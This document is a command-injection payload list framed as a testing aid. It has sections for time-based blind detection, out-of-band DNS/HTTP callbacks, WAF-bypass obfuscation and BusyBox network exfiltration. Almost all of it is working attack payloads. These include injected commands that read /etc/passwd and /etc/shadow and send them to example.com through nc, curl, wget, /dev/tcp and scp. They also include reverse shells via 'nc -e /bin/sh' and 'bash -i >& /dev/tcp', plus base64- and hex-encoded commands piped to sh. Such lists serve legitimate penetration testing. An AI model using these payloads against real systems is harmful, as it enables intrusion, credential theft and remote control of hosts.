command-injection, RCE, OOB exfiltration, WAF-bypass - payload lists
| Useful for testing command-injection handling in shell scripts, BusyBox applets, ELF binaries, CGI binaries, init scripts, IPC handlers, configuration parsers, etc. | |
| --- | |
| # --- TIME-BASED BLIND DETECTION --- | |
| ;sleep 10; | |
| |sleep 10| | |
| &sleep 10& | |
| \nsleep 10\n | |
| `sleep 10` | |
| $(sleep 10) | |
| ;sleep${IFS}10; | |
| ;busybox${IFS}sleep${IFS}10; | |
| ;X=sleep;Y=10;$X$IFS$Y; | |
| ;echo${IFS}c2xlZXAgMTA=|base64${IFS}-d|sh; | |
| ;printf${IFS}'\x73\x6c\x65\x65\x70\x20\x31\x30'|sh; | |
| ;timeout 10 sh -c 'sleep 10'; | |
| ;perl -e 'sleep 10'; | |
| ;python -c "import time;time.sleep(10)"; | |
| ;php -r "sleep(10);"; | |
| ;awk 'BEGIN{system("sleep 10")}'; | |
| ;sh -c "sleep 10"; | |
| ;bash -c "sleep 10"; | |
| ;$(sleep${IFS}10) | |
| ;`sleep${IFS}10` | |
| ;{sleep,10} | |
| ;exec sleep 10 | |
| ;true|sleep 10 | |
| ;false;sleep 10 | |
| # --- OUT-OF-BAND (OOB) DNS / HTTP DETECTION --- | |
| ;ping -c 4 $(whoami).example.com; | |
| |ping -c 4 `whoami`.example.com| | |
| &ping -c 4 $(uname -m).example.com& | |
| $(nslookup $(whoami).example.com) | |
| `nslookup \`uname -a\`.example.com` | |
| ;wget http://example.com/$(whoami); | |
| |wget http://example.com/`id`| | |
| ;curl http://example.com/$(whoami); | |
| |curl http://example.com/`id`| | |
| ;curl http://example.com/?d=$(id|base64); | |
| ;wget --post-data=$(id|base64) http://example.com/; | |
| ;curl -A $(whoami) http://example.com/ | |
| ;wget --header="X-Data: $(id)" http://example.com/ | |
| ;curl -d "data=$(uname -a)" http://example.com/ | |
| ;wget --header="User-Agent: $(whoami)" http://example.com/ | |
| ;ftp example.com <<< $(id) | |
| ;nc example.com 1234 <<< $(uname -a) | |
| ;echo $(id)|nc example.com 80 | |
| ;echo $(whoami)|telnet example.com 80 | |
| ;curl http://example.com/$(id|tr -d ' ') | |
| ;wget http://example.com/$(id|tr -d ' ') | |
| # --- WAF BYPASS / SPACE OBFUSCATION VARIANTS --- | |
| ;cat$IFS/etc/passwd; | |
| ;cat${IFS}/etc/passwd; | |
| ;cat$IFS$9/etc/passwd; | |
| ;{cat,/etc/passwd}; | |
| X=$'\x20';cat$X/etc/passwd; | |
| X=cat;Y=/etc/passwd;$X$IFS$Y; | |
| ;cat</etc/passwd; | |
| ;cat$IFS/etc/shadow; | |
| ;cat<<<"/etc/passwd"; | |
| ;cat$IFS</etc/passwd; | |
| ;cat</etc/shadow; | |
| ;{cat,/etc/shadow}; | |
| ;IFS=,;cat,/etc/passwd | |
| ;cat$IFS$1/etc/passwd | |
| ;cat$IFS$2/etc/passwd | |
| ;cat$IFS$PATH/etc/passwd | |
| # --- WAF BYPASS / CHARACTER OBFUSCATION VARIANTS --- | |
| ;c\a\t /e\t\c/p\a\s\s\w\d; | |
| ;c'a't /e't'c/p'a's's'w'd; | |
| ;c"a"t /e"t"c/p"a"s"s"w"d; | |
| ;cat /et*/*passwd; | |
| ;cat /et?/pas??w; | |
| ;echo$IFS'Y2F0IC9ldGMvcGFzc3dk'$IFS|$IFS'base64'$IFS'-d'|$IFS'sh'; | |
| ;printf$IFS'\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'|sh; | |
| ;c\at /etc/p\asswd | |
| ;c@t /etc/p@sswd | |
| ;c%at /etc/p%asswd | |
| ;c^at /etc/p^asswd | |
| ;c*at /etc/p*asswd | |
| ;ca\t /etc/pas\swd | |
| ;ca\t /etc/pas$IFS$swd | |
| ;echo$IFS'Y2F0IC9ldGMvc2hhZG93'|base64 -d|sh | |
| ;perl -e 'print "cat /etc/passwd\n"'|sh | |
| ;python -c "print('cat /etc/passwd')"|sh | |
| # --- OUT-OF-BAND VIA BUILT-IN NETWORK UTILITIES (BUSYBOX COMPATIBLE) --- | |
| ;host $(whoami).example.com; | |
| ;dig $(whoami).example.com; | |
| ;telnet example.com 80 </etc/passwd; | |
| ;cat /etc/passwd > /dev/tcp/example.com/80; | |
| ;nc example.com 80 < /etc/passwd; | |
| ;nc -e /bin/sh example.com 4444 | |
| ;exec 5<>/dev/tcp/example.com/80;cat /etc/passwd >&5 | |
| ;bash -i >& /dev/tcp/example.com/4444 0>&1 | |
| ;telnet example.com 1234 <<< $(whoami) | |
| ;ftp -n example.com <<< "quote USER $(id)" | |
| ;curl -T /etc/passwd http://example.com/ | |
| ;wget --method=PUT --body-file=/etc/passwd http://example.com/ | |
| ;scp /etc/passwd user@example.com:/tmp/ |